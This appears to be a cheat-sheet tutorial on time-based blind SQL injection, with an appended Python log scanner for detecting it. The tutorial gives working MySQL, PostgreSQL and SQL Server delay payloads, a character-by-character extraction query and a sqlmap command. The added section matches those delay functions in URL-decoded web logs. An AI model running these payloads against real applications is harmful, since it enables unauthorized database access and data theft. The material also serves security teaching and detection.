Time-Based Blind SQL Injection

Time-based blind SQLi is an inferential technique used when an application shows no difference in its output whether the injected condition is TRUE or FALSE. Instead, the attacker injects a conditional expression that makes the database pause for a specified number of seconds only when the condition is true.

The attacker can then infer the answer to the question based on how long the server takes to respond.

Methodology

The core of this attack is using a conditional statement (IF or CASE) combined with a time-delay function.

1. Confirm the Vulnerability

Inject a payload that causes a noticeable delay.

Vulnerable URL: http://example.com/items.php?id=1

MySQL (SLEEP) Payload:

-- If 1=1 (true), wait for 5 seconds.
' AND IF(1=1, SLEEP(5), 0)--

If the server takes approximately 5 seconds longer to respond, the vulnerability is confirmed.

PostgreSQL (pg_sleep) Payload:

' AND (SELECT pg_sleep(5)) IS NOT NULL--

Microsoft SQL Server (WAITFOR DELAY) Payload:

'; IF (1=1) WAITFOR DELAY '0:0:5'--

2. Enumerate Database Information

Similar to boolean-based techniques, you can now ask questions and infer the answer from the response time.

Extract Database Name (Character by Character):

-- If the first character of the database name is 'a', sleep for 5 seconds.
' AND IF((SELECT SUBSTRING(database(), 1, 1)) = 'a', SLEEP(5), 0)--

If the server delays, the character is 'a'. If not, try 'b', 'c', and so on.

3. Automation with sqlmap

sqlmap is essential for time-based attacks, as manual exploitation is impractical.

sqlmap -u "http://example.com/items.php?id=1" --dbs --technique=T
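Detection, as an added example (not part of the original cheat sheet): the three delay functions used in the payloads above (SLEEP, pg_sleep, WAITFOR DELAY) are easy to spot in web-server logs once the query string is URL-decoded, and correlating a matching request with an abnormally long response time shows whether the delay actually fired. The log lines, the Apache "%D" microsecond field and the 2-second threshold are assumptions for this example.

```python
import re
from urllib.parse import unquote_plus
# Constructed sample lines (Apache combined log format with the request
# duration in microseconds appended via "%D"); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /items.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0" 18342
203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /items.php?id=1%27%20AND%20IF(1%3D1%2C%20SLEEP(5)%2C%200)-- HTTP/1.1" 200 512 "-" "Mozilla/5.0" 5021877
203.0.113.5 - - [10/Oct/2023:13:55:47 +0000] "GET /items.php?id=1%27%20AND%20(SELECT%20pg_sleep(5))%20IS%20NOT%20NULL-- HTTP/1.1" 200 512 "-" "Mozilla/5.0" 5009113
203.0.113.9 - - [10/Oct/2023:13:56:02 +0000] "GET /items.php?id=2 HTTP/1.1" 200 498 "-" "curl/8.0" 20115
203.0.113.5 - - [10/Oct/2023:13:56:10 +0000] "GET /items.php?id=1%27%3B%20IF%20(1%3D1)%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 200 512 "-" "Mozilla/5.0" 5030420
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" (?P<micros>\d+)$')
# Time-delay functions from the MySQL, PostgreSQL and SQL Server payloads above.
DELAY_RE = re.compile(r"sleep\s*\(|pg_sleep\s*\(|waitfor\s+delay", re.IGNORECASE)
SLOW_THRESHOLD_US = 2_000_000  # 2 s; tune to the application's normal latency

def parse_line(line):
    """Parse one log line; URL-decode the request path so encoded payloads match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["decoded"] = unquote_plus(entry["path"])
    entry["micros"] = int(entry["micros"])
    return entry

def classify(entry):
    """Label a parsed entry: payload plus a real delay is the strongest signal;
    payload without delay still shows someone probing the parameter."""
    has_delay = DELAY_RE.search(entry["decoded"]) is not None
    slow = entry["micros"] >= SLOW_THRESHOLD_US
    if has_delay and slow:
        return "time-based-sqli-likely"
    if has_delay:
        return "time-based-sqli-probe"
    return None

def scan(log_text):
    """Return (ip, decoded path, seconds, label) for every flagged line."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        label = classify(entry) if entry else None
        if label:
            findings.append((entry["ip"], entry["decoded"], entry["micros"] / 1e6, label))
    return findings
```

A request that carries the payload but returns quickly is still worth an alert: it usually means the parameter is parameterized or filtered, but the client is actively testing it.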